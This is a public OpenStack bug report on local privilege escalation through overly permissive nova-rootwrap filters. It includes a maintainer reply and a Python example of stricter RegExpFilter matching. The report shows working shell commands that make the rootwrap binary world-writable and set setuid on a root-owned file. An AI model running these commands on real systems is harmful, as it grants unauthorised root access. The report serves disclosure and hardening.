privilege escalation thru nova-rootwrap

Bug #1092491 reported by Nikita Savin
Affects: OpenStack Compute (nova)
Status: Incomplete
Importance: Undecided
Assigned to: Unassigned
Milestone: (none)

Bug Description

bash-4.1$ id
uid=162(nova) gid=162(nova) groups=162(nova),99(nobody),107(qemu),488(fuse)
bash-4.1$ sudo /usr/bin/nova-rootwrap chmod 777 /usr/bin/nova-rootwrap
bash-4.1$ ls /usr/bin/nova-rootwrap -l
-rwxrwxrwx 1 root root 2674 Dec 20 08:27 /usr/bin/nova-rootwrap

After this, an attacker can change the nova-rootwrap content and run any command with root privileges.

A possible way to fix this issue is to limit the paths on which chmod can be used.
(But there will be several more issues; for example:
touch /var/lib/nova/smth
sudo nova-rootwrap chown root /var/lib/nova/smth
sudo nova-rootwrap chmod +s /var/lib/nova/smth)

Please let me know if you want me to provide patches for the issues I see with nova-rootwrap.

Thierry Carrez (ttx) wrote :

Yes, it's a well-known issue that some filters are way too permissive for successful isolation if you use them (chown, chmod, dd come to mind). Ideally we would get rid of chmod/chown/dd usage in Nova completely. In the meantime, using RegExpFilter instead of CommandFilter could help.

This is mostly the same as https://bugs.launchpad.net/nova/+bug/948520, so I suggest we just mark this one a duplicate of it.
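
As an added example (not nova's own code; the filter-line syntax and the hardened pattern are assumptions for illustration), a minimal model of the two filter types named in this thread, showing why a CommandFilter lets the chmod from the report through while a RegExpFilter pinned to numeric modes and one directory rejects it:

```python
import os
import re

# Added example, not nova's own code: a minimal model of the matching rules of
# the two rootwrap filter classes named in the thread. The filter-line syntax
# ("name: Class, exec_path, run_as, pattern...") and the hardened pattern below
# are assumptions for illustration.


class CommandFilter:
    """Only checks that the command name matches; arguments are not inspected."""

    def __init__(self, exec_path, run_as, *args):
        self.exec_path = exec_path
        self.run_as = run_as
        self.args = args

    def match(self, userargs):
        return bool(userargs) and os.path.basename(userargs[0]) == os.path.basename(self.exec_path)


class RegExpFilter(CommandFilter):
    """Every argument (command name included) must fully match its own regexp."""

    def match(self, userargs):
        if len(userargs) != len(self.args):
            return False  # wrong argument count is a deny
        return all(re.fullmatch(p, a) for p, a in zip(self.args, userargs))


def parse_filter(line):
    """Turn one filter line into a filter object."""
    _name, spec = line.split(":", 1)
    cls_name, *params = [p.strip() for p in spec.split(",")]
    cls = {"CommandFilter": CommandFilter, "RegExpFilter": RegExpFilter}[cls_name]
    return cls(*params)


def allowed(filter_lines, userargs):
    """True if any filter accepts the command line rootwrap was asked to run."""
    return any(parse_filter(line).match(userargs) for line in filter_lines)


# Permissive filter of the kind the report describes.
PERMISSIVE = ["chmod: CommandFilter, /bin/chmod, root"]
# Assumed hardened form: a numeric mode and a path under one directory, where
# every path component must start with an alphanumeric (no '.', '..' or '//').
HARDENED = ["chmod: RegExpFilter, /bin/chmod, root, chmod, 0?[0-7]{3},"
            " /var/lib/nova/instances(/[A-Za-z0-9_-][A-Za-z0-9_.-]*)+"]
```

With these lists, `allowed(PERMISSIVE, ["chmod", "777", "/usr/bin/nova-rootwrap"])` is True and the same call against HARDENED is False, as are a `+s` mode and a `..` traversal under the permitted directory.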

Changed in nova:
status: New → Incomplete

Thierry Carrez (ttx):
information type: Private Security → Public